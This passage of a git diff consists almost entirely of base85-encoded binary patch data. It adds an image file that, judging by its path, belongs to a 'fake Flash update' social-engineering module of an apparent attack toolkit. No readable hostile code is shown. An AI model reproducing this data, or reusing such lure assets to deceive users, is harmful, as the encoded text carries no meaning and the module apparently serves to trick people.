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

literal 0
HcmV?d00001

diff --git a/modules/social_engineering/fake_flash_update/img/ita.png b/modules/social_engineering/fake_flash_update/img/ita.png
new file mode 100644
index 0000000000000000000000000000000000000000..e3c773f6014441d34a326e21391c87f8b58d09cc
GIT binary patch
literal 76853
zcmV)PK()V#P)<h;3K|Lk000e1NJLTq00O!I00C170ssI2Sv)wI002M$Nkl<ZcmeEP
z2V4|K7atYrg504fMG#O>5KsX{!ETUP5=(5cL`^iY#}Z@jy~Gj|HI^7nqJFlhF&Y(X
z5_|883JS&^RHS&y_h#pAZf<XPZ?91j=9ipr-@NjFWq0Rxm)l}}`}QqXtXOVtF8M^<
zC|<lc{QLIpTi^o$Q-n`HVG5Xp4>Xl0OxOe_5e5rH*v7_&NWv!}SmQv$07dwO*%Bp6
zfI1MwAP}%gya2(;=7J320|&%_NrY7@6->Q(^M)9KSr{M*0A9a-O<cey45AK-AOO0s
zNtp0Sm|y{{!6vZ)pM(Yi2I~TJL50K!H0zoGBPuXOKmwC`q2P&Akfa_72Ly;Z{iJq)
z12mN<#$gkfL>Md(;iCMLTovV?^d4;z+GC`V$R}YI^*`wrvNw^v47v!C0|Syn_`m@%
z;1J=W;}2~uk}Jp(WTxo&^Dj956l>kOHEDPFG-^2J<gD4T!zdN=g}b+E^~%;(%nsRI
z#byZ~WTXWoX64wIP?wmZM<NLsnN!jMS}z0&&w{alP3dr`QyyVi3}D>i26=!@3zKKW
z%uTCe$b-f+Gkl_M?LrHJWHS%T4nY}{nXGY>jaW*Nv;kgiSvpKhA(U^YP=r8NwDRL(
zCAmVW8}j+{=Qiw|QM8#jjPgZ=&38&_Y{D)?8l56BpD+P~`A)$Cugfh0!y-m35*;zZ
zi;-v91hmoy!M+JLd8qP!GjA}9c`=yMyv(W?$h<GgzuTjnqUTozpa%*vJcDVmAb2rT
z>g57&x@hMySR0E7<b9s4RA`F_Vx~b}n7m?{VBF#cd5|RRn}C*QJl{9<Lx6ZCLS_N$
z>$0<!qVvX!7+RUB5L4&zNi1M9e}m$oqMMctmYOw_fLy^a3LD6aIi+@ZGL$c-Xb#`9
z#s#gJes#f|z^tKb)Kx@YE_g+?20VS6fB}Y4u=R}q#~knkgP>W;1pCr1%nyP3q67dV
zw6tp~FNd%=PKz64qp)D$tXZI~XPM`SZqjN>aOe~e6d@(p*&<p_28vQgvjnMNv%wzp
